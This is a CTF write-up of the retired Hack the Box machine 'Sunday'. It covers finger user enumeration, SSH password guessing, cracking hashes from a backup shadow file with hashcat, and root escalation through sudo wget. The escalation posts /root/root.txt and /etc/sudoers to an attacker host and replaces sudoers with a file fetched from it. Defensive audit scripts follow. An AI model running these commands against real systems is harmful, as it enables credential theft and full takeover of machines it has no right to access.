Capture the flag (CTF)

Hack the Box (HTB) machines walkthrough series — Sunday

April 29, 2019 by Security Ninja

Today, we will be continuing with our exploration of Hack the Box (HTB) machines as begun in the previous article. This walkthrough is of an HTB machine named Sunday.

HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges. Individuals have to solve a puzzle (simple enumeration plus pentest) in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.

Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Sunday, is retired.

The Walkthrough

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The “Sunday” machine IP is 10.10.10.76.

3. We will adopt the same methodology of performing penetration testing as we have used previously. Let’s start with enumeration in order to learn as much information about the machine as possible.

4. As usual, let’s start with the nmap scan to gather more information about the services running on this machine.
<<nmap -sC -sV -oA Sunday 10.10.10.76>>

5. We got some juicy information, such as the finger service, but some common ports such as SSH and HTTP are missing. To make sure we do not miss any ports, let’s use SPARTA to find other ports as well.

6. Make sure an Nmap staged scan is selected in SPARTA. As we can see, SPARTA was able to find an SSH service on port 22022.

7. Let’s confirm that with Nmap as well.
<<nmap -sC -sV -p 22022 10.10.10.76>>

8. OK, so if we get the username from finger, we can then try to log into the box.

9. As we can see using finger on the box, it says that no user is logged on.
<<finger @10.10.10.76>>

10. To dig more into this box, we can use the enumeration script found here.
<<perl script.pl -t 10.10.10.76 -U /usr/share/wordlists/rockyou.txt>>

11. As we can see, we’ve gotten two possible users: Sunny and Sammy.

12. We can confirm these users with finger as well.

<<finger sunny@10.10.10.76>>

<<finger sammy@10.10.10.76>>

13. Now it’s time to extract the password as well. I tried looking everywhere in the box but couldn’t find any password. So my last resort is to guess the password. I tried the following combinations: sunny/root, sunny/admin, sunny/sunny, sunny/sammy, sunny/sunday and sammy/root, sammy/admin, sammy/sammy, sammy/sunny and sammy/sunday.

14. Out of the above combinations, sunny/sunday worked and now I can log into the box.
<<ssh sunny@10.10.10.76 -p 22022>>

15. There is no user.txt available for this user.

16. Looking into sudo permissions, the sunny user can run the /root/troll file. Below is an example.

<<sudo -l>>

<<sudo /root/troll>>

17. Browsing more into Sunny, we can see there is a backup directory which contains the agent22 and shadow.backup files.
<<ls -la>>

18. Looking into the shadow.backup file reveals the hash entries for sammy and sunny.

19. Let’s see what category of hashes these are under Hashcat. As we can see below, these are SHA-256 crypt hashes, which Hashcat handles as mode 7400.

20. Now we’re copying the hashes into a file: htb.hashes.

21. Running hashcat on the collected hashes as shown below:
<<hashcat -m 7400 htb.hashes /usr/share/wordlists/rockyou.txt --force>>

22. As we can see, both passwords got a hit.

23. Logging into the system with Sammy and the discovered password as below:
<<ssh sammy@10.10.10.76 -p 22022>>

24. Capture the user.txt file:

<<cd Desktop>>

<<ls>>

<<cat user.txt>>

25. Now let’s see what sudo permissions this user has on the system.
<<sudo -l>>

26. It looks like Sammy can run the wget utility as root.

27. We can use the wget --post-file parameter to post the contents of root.txt. Let’s see if that works. We spin up a Netcat listener on port 80 on our attacker machine.
<<sudo wget --post-file=/root/root.txt <attacker machine>>>

28. We can capture the flag that way, but let’s do something else with these elevated privileges to get a root shell on the box.

29. What if we post the /etc/sudoers file and make Sammy or Sunny execute anything as root? Let’s first see the contents of /etc/sudoers.
<<sudo wget --post-file=/etc/sudoers <attacker machine ip>>>

30. Copying the contents of /etc/sudoers into sudoers and changing the permissions of Sammy to ALL=(root) NOPASSWD: ALL as shown below.

31. We fetch this file and install it as /etc/sudoers, since wget is effectively running as root.
<<sudo wget -O /etc/sudoers http://<attacker_ip>:8000/sudoers>>

32. Now we can see that with just one command, Sammy becomes root and takes complete control of the box.

<<sudo su>>

<<id>>
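The escalation in steps 26 to 32 depends on a single sudoers rule that lets a user run wget as root. As an added example (not part of the original walkthrough), this Python audit flags rules of that kind; the binary list, the `audit_sudoers` name and the sample rules are assumptions constructed for illustration.

```python
import re

# Assumed, non-exhaustive: binaries that can read or overwrite any file as root.
FILE_RW_BINARIES = {"wget", "curl", "cp", "dd", "tar", "tee"}

SPEC_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG_RE = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...
SKIP_RE = re.compile(r"^(#|Defaults|(User|Runas|Host|Cmnd)_Alias\b)")


def audit_sudoers(text):
    """Return (user, command, reason) for rules that hand out root file access."""
    findings = []
    # A trailing backslash continues a sudoers rule on the next line.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.strip()
        if not line or SKIP_RE.match(line):
            continue  # comments, Defaults and alias definitions are not expanded
        spec = SPEC_RE.match(line)
        if not spec:
            continue
        who, _host, runas, cmds = spec.groups()
        # No (runas) part means root; "(ALL : ALL)" lists users before the colon.
        targets = {u.strip() for u in (runas or "root").split(":")[0].split(",")}
        if who == "root" or not targets & {"root", "ALL"}:
            continue
        for part in cmds.split(","):
            cmd = TAG_RE.sub("", part.strip())
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if cmd == "ALL":
                findings.append((who, cmd, "any command as root"))
            elif binary in FILE_RW_BINARIES:
                pinned = "arguments pinned" if " " in cmd else "any arguments"
                findings.append((who, cmd, "file read/write as root, " + pinned))
    return findings


# Constructed sample, modelled on the two rules the walkthrough describes.
SAMPLE = """\
root   ALL=(ALL) ALL
sunny  ALL=(root) NOPASSWD: /root/troll
sammy  ALL=(root) NOPASSWD: /usr/bin/wget
deploy ALL=(www) /usr/bin/tar
ops    ALL = NOPASSWD: /usr/bin/systemctl restart nginx, \\
       /usr/bin/tee /etc/motd
"""

if __name__ == "__main__":
    print(*audit_sudoers(SAMPLE), sep="\n")
```

A rule reported with "any arguments" is the case seen on this box: the user chooses which file wget reads or overwrites.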

This is an interesting box. The first step is to guess the user password, after making sure to enumerate all the ports; then we enumerate the system to collect user hashes. Finally, we use wget, run as root through sudo, to overwrite the sudoers file.
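Steps 17 to 22 worked because a copy of the shadow file sat in a directory a low-privileged user could read. This added example, not from the original article, scans a directory tree for files holding shadow-style hash entries that are not restricted to root; the function names and the sample tree are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# user:$id$salt$digest:... , the crypt(3) form used in shadow files
SHADOW_LINE = re.compile(r"^[A-Za-z_][\w.-]*:\$[0-9a-z]+\$[^:]+:")


def find_exposed_shadow_copies(root, max_bytes=1_000_000):
    """Return (path, accounts) for files with shadow-style hashes not locked to root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode) or st.st_size > max_bytes:
                    continue  # skip symlinks, devices and very large files
                with open(path, "r", errors="replace") as fh:
                    accounts = [ln.split(":", 1)[0] for ln in fh if SHADOW_LINE.match(ln)]
            except OSError:
                continue  # unreadable to the scanning user
            # Exposed: group/other can read it, or it is owned by a non-root user.
            exposed = bool(st.st_mode & (stat.S_IRGRP | stat.S_IROTH)) or st.st_uid != 0
            if accounts and exposed:
                hits.append((path, accounts))
    return hits


def demo():
    """Scan a constructed tree that mimics the backup directory in step 17."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = os.path.join(tmp, "backup")
        os.mkdir(backup)
        with open(os.path.join(backup, "shadow.backup"), "w") as fh:
            # Constructed entries; the salt and digest are placeholders.
            fh.write("root:NP:6445::::::\n"
                     "sammy:$5$PLACEHOLDERSALT$placeholder-digest:6445::::::\n"
                     "sunny:$5$PLACEHOLDERSALT$placeholder-digest:17636::::::\n")
        os.chmod(os.path.join(backup, "shadow.backup"), 0o644)
        with open(os.path.join(backup, "notes.txt"), "w") as fh:
            fh.write("nothing sensitive here\n")
        found = find_exposed_shadow_copies(tmp)
        return [(os.path.relpath(p, tmp), users) for p, users in found]


if __name__ == "__main__":
    print(demo())
```

Run it as root over real file systems so that files unreadable to ordinary users are still inspected.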

We will continue this series with more, similarly interesting machines.